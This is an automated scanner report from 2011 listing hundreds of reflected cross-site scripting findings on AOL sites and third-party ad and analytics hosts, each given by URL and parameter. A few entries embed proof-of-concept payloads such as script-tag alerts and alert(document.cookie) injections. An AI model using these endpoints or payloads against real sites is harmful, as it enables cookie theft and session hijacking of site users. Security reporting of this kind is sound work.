XSS, Cross Site Scripting, aol.com, CWE-79, CAPEC-86

XSs in AOL HTTP Systems | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 17:40:33 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

1.2. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

1.3. http://about.aol.com/aolnetwork/mem_tos [REST URL parameter 1]

1.4. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]

1.5. http://about.aol.com/sitemap/ [REST URL parameter 1]

1.6. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]

1.7. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]

1.8. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [kw parameter]

1.9. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [name of an arbitrarily supplied request parameter]

1.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter]

1.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [name of an arbitrarily supplied request parameter]

1.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 2]

1.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 3]

1.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [click parameter]

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [name of an arbitrarily supplied request parameter]

1.16. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]

1.17. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]

1.18. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [name of an arbitrarily supplied request parameter]

1.19. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [pageId parameter]

1.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

1.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.22. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

1.23. http://adsfac.us/ag.asp [cc parameter]

1.24. http://adv-chart-app.app.aol.com/pfsg/sdr [echo parameter]

1.25. http://advertising.aol.com/brands/dailyfinance [REST URL parameter 2]

1.26. http://advertising.aol.com/brands/dailyfinance [name of an arbitrarily supplied request parameter]

1.27. http://advertising.aol.com/brands/engadget [REST URL parameter 2]

1.28. http://advertising.aol.com/brands/engadget [name of an arbitrarily supplied request parameter]

1.29. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

1.30. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

1.31. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

1.32. http://aol.tt.omtrdc.net/m2/aol/mbox/standard [mbox parameter]

1.33. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.34. http://api.bizographics.com/v1/profile.json [callback parameter]

1.35. http://api.dimestore.com/viapi [name parameter]

1.36. http://api.dimestore.com/viapi [name parameter]

1.37. http://api.dimestore.com/viapi [value parameter]

1.38. http://api.facebook.com/restserver.php [method parameter]

1.39. http://api.facebook.com/restserver.php [urls parameter]

1.40. http://api.screenname.aol.com/auth/getToken [c parameter]

1.41. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

1.42. http://ar.voicefive.com/b/rc.pli [func parameter]

1.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 1]

1.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 2]

1.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 3]

1.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 4]

1.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 5]

1.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 6]

1.49. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 7]

1.50. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [name of an arbitrarily supplied request parameter]

1.51. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [noperf parameter]

1.52. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

1.53. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

1.54. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

1.55. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

1.56. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

1.57. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

1.58. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

1.59. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

1.60. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.63. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.64. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.65. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.66. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.67. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.68. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.69. http://chinese.engadget.com/ [name of an arbitrarily supplied request parameter]

1.70. http://cn.engadget.com/ [name of an arbitrarily supplied request parameter]

1.71. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

1.72. http://coverage.mqcdn.com/coverage [cat parameter]

1.73. http://coverage.mqcdn.com/coverage [jsonp parameter]

1.74. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

1.75. http://coverage.mqcdn.com/favicon.ico [REST URL parameter 1]

1.76. http://ct.buzzfeed.com/wd/UserWidget [or parameter]

1.77. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

1.78. http://digg.com/submit [REST URL parameter 1]

1.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 2]

1.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 3]

1.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 4]

1.82. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 2]

1.83. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 3]

1.84. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 4]

1.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 2]

1.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 3]

1.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 4]

1.88. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 2]

1.89. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 3]

1.90. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 4]

1.91. http://downloads.channel.aol.com/toolbar [REST URL parameter 1]

1.92. http://downloadsquad.switched.com/ [name of an arbitrarily supplied request parameter]

1.93. http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/ [name of an arbitrarily supplied request parameter]

1.94. http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/ [name of an arbitrarily supplied request parameter]

1.95. http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/ [name of an arbitrarily supplied request parameter]

1.96. http://ds.addthis.com/red/psi/sites/www.politicsdaily.com/p.json [callback parameter]

1.97. http://electronista.us.intellitxt.com/al.asp [jscallback parameter]

1.98. http://electronista.us.intellitxt.com/iframescript.jsp [src parameter]

1.99. http://electronista.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

1.100. http://electronista.us.intellitxt.com/v4/advert [jscallback parameter]

1.101. http://electronista.us.intellitxt.com/v4/context [jscallback parameter]

1.102. http://electronista.us.intellitxt.com/v4/init [jscallback parameter]

1.103. http://electronista.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

1.104. http://es.engadget.com/ [name of an arbitrarily supplied request parameter]

1.105. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.106. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

1.107. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

1.108. http://fonts.citysbest.com/uni0vle.js [REST URL parameter 1]

1.109. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.110. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.111. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.112. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]

1.113. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]

1.114. http://help.aol.com/help/product/aim [name of an arbitrarily supplied request parameter]

1.115. http://help.aol.com/help/product/aim/ [name of an arbitrarily supplied request parameter]

1.116. http://japanese.engadget.com/ [name of an arbitrarily supplied request parameter]

1.117. http://jlinks.industrybrains.com/jsct [ct parameter]

1.118. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

1.119. http://jlinks.industrybrains.com/jsct [tr parameter]

1.120. http://js.revsci.net/gateway/gw.js [csid parameter]

1.121. http://kr.engadget.com/ [name of an arbitrarily supplied request parameter]

1.122. http://learn2.aol.com/learn.js [REST URL parameter 1]

1.123. http://learn2.aol.com/learn.js [callback parameter]

1.124. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]

1.125. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]

1.126. http://mads.cbs.com/mac-ad [BRAND parameter]

1.127. http://mads.cbs.com/mac-ad [BRAND parameter]

1.128. http://mads.cbs.com/mac-ad [BRAND parameter]

1.129. http://mads.cbs.com/mac-ad [CELT parameter]

1.130. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

1.131. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

1.132. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

1.133. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

1.134. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

1.135. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

1.136. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.137. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.138. http://mads.cbs.com/mac-ad [NCAT parameter]

1.139. http://mads.cbs.com/mac-ad [NCAT parameter]

1.140. http://mads.cbs.com/mac-ad [NODE parameter]

1.141. http://mads.cbs.com/mac-ad [NODE parameter]

1.142. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

1.143. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

1.144. http://mads.cbs.com/mac-ad [POS parameter]

1.145. http://mads.cbs.com/mac-ad [PTYPE parameter]

1.146. http://mads.cbs.com/mac-ad [PTYPE parameter]

1.147. http://mads.cbs.com/mac-ad [SITE parameter]

1.148. http://mads.cbs.com/mac-ad [cookiesOn parameter]

1.149. http://mads.cbs.com/mac-ad [cookiesOn parameter]

1.150. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

1.151. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

1.152. http://mads.cbs.com/mac-ad [x-cb parameter]

1.153. http://mads.cbs.com/mac-ad [x-cb parameter]

1.154. http://marlothomas.aol.com/ [name of an arbitrarily supplied request parameter]

1.155. http://mlb.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.156. http://money.aol.com/reflector/setCookie [cb parameter]

1.157. http://motorsports.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.158. http://movies.aol.com/trailers/main.adp [REST URL parameter 1]

1.159. http://nba.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.160. http://ncaabasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.161. http://ncaafootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.162. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 4]

1.163. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 5]

1.164. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 6]

1.165. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [_RM_HTML_MM_ parameter]

1.166. http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/ [name of an arbitrarily supplied request parameter]

1.167. http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/ [name of an arbitrarily supplied request parameter]

1.168. http://news.travel.aol.com/2011/01/12/travel-myths-debunked/ [name of an arbitrarily supplied request parameter]

1.169. http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/ [name of an arbitrarily supplied request parameter]

1.170. http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/ [name of an arbitrarily supplied request parameter]

1.171. http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/ [name of an arbitrarily supplied request parameter]

1.172. http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/ [name of an arbitrarily supplied request parameter]

1.173. http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/ [name of an arbitrarily supplied request parameter]

1.174. http://news.travel.aol.com/explore-america/ [name of an arbitrarily supplied request parameter]

1.175. http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/ [name of an arbitrarily supplied request parameter]

1.176. http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/ [name of an arbitrarily supplied request parameter]

1.177. http://nfl.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.178. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]

1.179. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]

1.180. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]

1.181. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]

1.182. http://nhl.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.183. http://noticias.aol.com/category/latino-news/ [REST URL parameter 2]

1.184. http://ocp.cbs.com/pacific/Response.jsp [c parameter]

1.185. http://pglb.buzzfed.com/12659/989cc9ecbfd3d382e27b06d49f58dc6f [callback parameter]

1.186. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

1.187. http://realestate.aol.com/blog/2011/02/04/million-dollar-home-defaults-just-what-the-doctor-ordered/ [REST URL parameter 4]

1.188. http://realestate.aol.com/blog/2011/02/04/worst-foreclosed-home-vandalism-ever/ [REST URL parameter 4]

1.189. http://servedby.flashtalking.com/imp/3/14886 [97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter]

1.190. http://servedby.flashtalking.com/imp/3/14886 [97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter]

1.191. http://servedby.flashtalking.com/imp/3/14886 [cachebuster parameter]

1.192. http://servedby.flashtalking.com/imp/3/14886 [ftadz parameter]

1.193. http://servedby.flashtalking.com/imp/3/14886 [ftscw parameter]

1.194. http://servedby.flashtalking.com/imp/3/14886 [ftx parameter]

1.195. http://servedby.flashtalking.com/imp/3/14886 [fty parameter]

1.196. http://servedby.flashtalking.com/imp/3/14886 [name of an arbitrarily supplied request parameter]

1.197. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]

1.198. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [REST URL parameter 3]

1.199. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [name of an arbitrarily supplied request parameter]

1.200. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [REST URL parameter 3]

1.201. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [name of an arbitrarily supplied request parameter]

1.202. http://smallbusiness.aol.com/2011/02/05/make-friends/ [REST URL parameter 3]

1.203. http://smallbusiness.aol.com/2011/02/05/make-friends/ [name of an arbitrarily supplied request parameter]

1.204. http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/ [name of an arbitrarily supplied request parameter]

1.205. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [REST URL parameter 3]

1.206. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [name of an arbitrarily supplied request parameter]

1.207. http://smallbusiness.aol.com/category/advertising-and-marketing/ [REST URL parameter 2]

1.208. http://smallbusiness.aol.com/category/advertising-and-marketing/ [name of an arbitrarily supplied request parameter]

1.209. http://smallbusiness.aol.com/category/money/ [REST URL parameter 2]

1.210. http://smallbusiness.aol.com/category/money/ [name of an arbitrarily supplied request parameter]

1.211. http://smallbusiness.aol.com/category/starting-a-business/ [REST URL parameter 2]

1.212. http://smallbusiness.aol.com/category/starting-a-business/ [name of an arbitrarily supplied request parameter]

1.213. http://sports.aol.com/a [REST URL parameter 1]

1.214. http://sports.aol.com/a [REST URL parameter 1]

1.215. http://sports.aol.com/favicon.ico [REST URL parameter 1]

1.216. http://sports.aol.com/favicon.ico [REST URL parameter 1]

1.217. http://sports.aol.com/scores [REST URL parameter 1]

1.218. http://sports.aol.com/scores [REST URL parameter 1]

1.219. http://switcher.dmn.aol.com/sw/a [callback parameter]

1.220. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

1.221. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.222. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.223. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.224. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.225. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.226. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]

1.227. http://webcenter.polls.aol.com/modular.jsp [template parameter]

1.228. http://www.aisledash.com/ [3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter]

1.229. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]

1.230. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]

1.231. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 1]

1.232. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 2]

1.233. http://www.aolhealth.com/encyclopedia/health/ [name of an arbitrarily supplied request parameter]

1.234. http://www.aolhealth.com/traffic/ [REST URL parameter 1]

1.235. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]

1.236. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]

1.237. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]

1.238. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]

1.239. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.240. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.241. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [REST URL parameter 3]

1.242. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]

1.243. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]

1.244. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [REST URL parameter 3]

1.245. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]

1.246. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]

1.247. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [REST URL parameter 3]

1.248. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]

1.249. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]

1.250. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 1]

1.251. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 2]

1.252. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

1.253. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

1.254. http://www.bloggingstocks.com/category/stocks-to-buy/ [REST URL parameter 2]

1.255. http://www.bloggingstocks.com/category/stocks-to-buy/ [REST URL parameter 2]

1.256. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]

1.257. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]

1.258. http://www.bloggingstocks.com/category/stocks-to-sell/ [REST URL parameter 2]

1.259. http://www.bloggingstocks.com/category/stocks-to-sell/ [REST URL parameter 2]

1.260. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]

1.261. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]

1.262. http://www.bloglines.com/sub/__FEED__ [REST URL parameter 2]

1.263. http://www.bloglines.com/sub/__FEED__ [REST URL parameter 2]

1.264. http://www.bloglines.com/sub/__FEED__ [REST URL parameter 2]

1.265. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]

1.266. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]

1.267. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]

1.268. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

1.269. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

1.270. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

1.271. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

1.272. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

1.273. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

1.274. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

1.275. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

1.276. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

1.277. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

1.278. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 3]

1.279. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 3]

1.280. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]

1.281. http://www.cbs.com/primetime/big_bang_theory/video/ [nrd parameter]

1.282. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.283. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.284. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.285. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.286. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]

1.287. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]

1.288. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter]

1.289. http://www.citysbest.com/_uac/adpage.html [REST URL parameter 1]

1.290. http://www.citysbest.com/_uac/adpage.html [REST URL parameter 1]

1.291. http://www.citysbest.com/mapquest/ [REST URL parameter 1]

1.292. http://www.citysbest.com/mapquest/ [REST URL parameter 1]

1.293. http://www.citysbest.com/traffic/ [REST URL parameter 1]

1.294. http://www.citysbest.com/traffic/ [REST URL parameter 1]

1.295. http://www.citysbest.com/traffic/status.gif [REST URL parameter 1]

1.296. http://www.citysbest.com/traffic/status.gif [REST URL parameter 1]

1.297. http://www.citysbest.com/traffic/status.gif [REST URL parameter 2]

1.298. http://www.citysbest.com/traffic/status.gif [REST URL parameter 2]

1.299. http://www.dailyfinance.com/ [3054c%22-alert(document.cookie)-%22c83105876b0 parameter]

1.300. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]

1.301. http://www.dailyfinance.com/about/ [name of an arbitrarily supplied request parameter]

1.302. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]

1.303. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]

1.304. http://www.dailyfinance.com/category/careers/ [REST URL parameter 2]

1.305. http://www.dailyfinance.com/category/careers/ [REST URL parameter 2]

1.306. http://www.dailyfinance.com/category/careers/ [name of an arbitrarily supplied request parameter]

1.307. http://www.dailyfinance.com/category/college-finance/ [REST URL parameter 2]

1.308. http://www.dailyfinance.com/category/college-finance/ [REST URL parameter 2]

1.309. http://www.dailyfinance.com/category/college-finance/ [name of an arbitrarily supplied request parameter]

1.310. http://www.dailyfinance.com/category/columns/ [REST URL parameter 2]

1.311. http://www.dailyfinance.com/category/columns/ [REST URL parameter 2]

1.312. http://www.dailyfinance.com/category/columns/ [name of an arbitrarily supplied request parameter]

1.313. http://www.dailyfinance.com/category/earnings/ [REST URL parameter 2]

1.314. http://www.dailyfinance.com/category/earnings/ [REST URL parameter 2]

1.315. http://www.dailyfinance.com/category/earnings/ [name of an arbitrarily supplied request parameter]

1.316. http://www.dailyfinance.com/category/economy/ [REST URL parameter 2]

1.317. http://www.dailyfinance.com/category/economy/ [REST URL parameter 2]

1.318. http://www.dailyfinance.com/category/economy/ [name of an arbitrarily supplied request parameter]

1.319. http://www.dailyfinance.com/category/healthcare/ [REST URL parameter 2]

1.320. http://www.dailyfinance.com/category/healthcare/ [REST URL parameter 2]

1.321. http://www.dailyfinance.com/category/healthcare/ [name of an arbitrarily supplied request parameter]

1.322. http://www.dailyfinance.com/category/investing/ [REST URL parameter 2]

1.323. http://www.dailyfinance.com/category/investing/ [REST URL parameter 2]

1.324. http://www.dailyfinance.com/category/investing/ [name of an arbitrarily supplied request parameter]

1.325. http://www.dailyfinance.com/category/media/ [REST URL parameter 2]

1.326. http://www.dailyfinance.com/category/media/ [REST URL parameter 2]

1.327. http://www.dailyfinance.com/category/media/ [name of an arbitrarily supplied request parameter]

1.328. http://www.dailyfinance.com/category/real-estate/ [REST URL parameter 2]

1.329. http://www.dailyfinance.com/category/real-estate/ [REST URL parameter 2]

1.330. http://www.dailyfinance.com/category/real-estate/ [name of an arbitrarily supplied request parameter]

1.331. http://www.dailyfinance.com/category/special-report/ [REST URL parameter 2]

1.332. http://www.dailyfinance.com/category/special-report/ [REST URL parameter 2]

1.333. http://www.dailyfinance.com/category/special-report/ [name of an arbitrarily supplied request parameter]

1.334. http://www.dailyfinance.com/category/streetwise [REST URL parameter 2]

1.335. http://www.dailyfinance.com/category/streetwise [REST URL parameter 2]

1.336. http://www.dailyfinance.com/category/technology/ [REST URL parameter 2]

1.337. http://www.dailyfinance.com/category/technology/ [REST URL parameter 2]

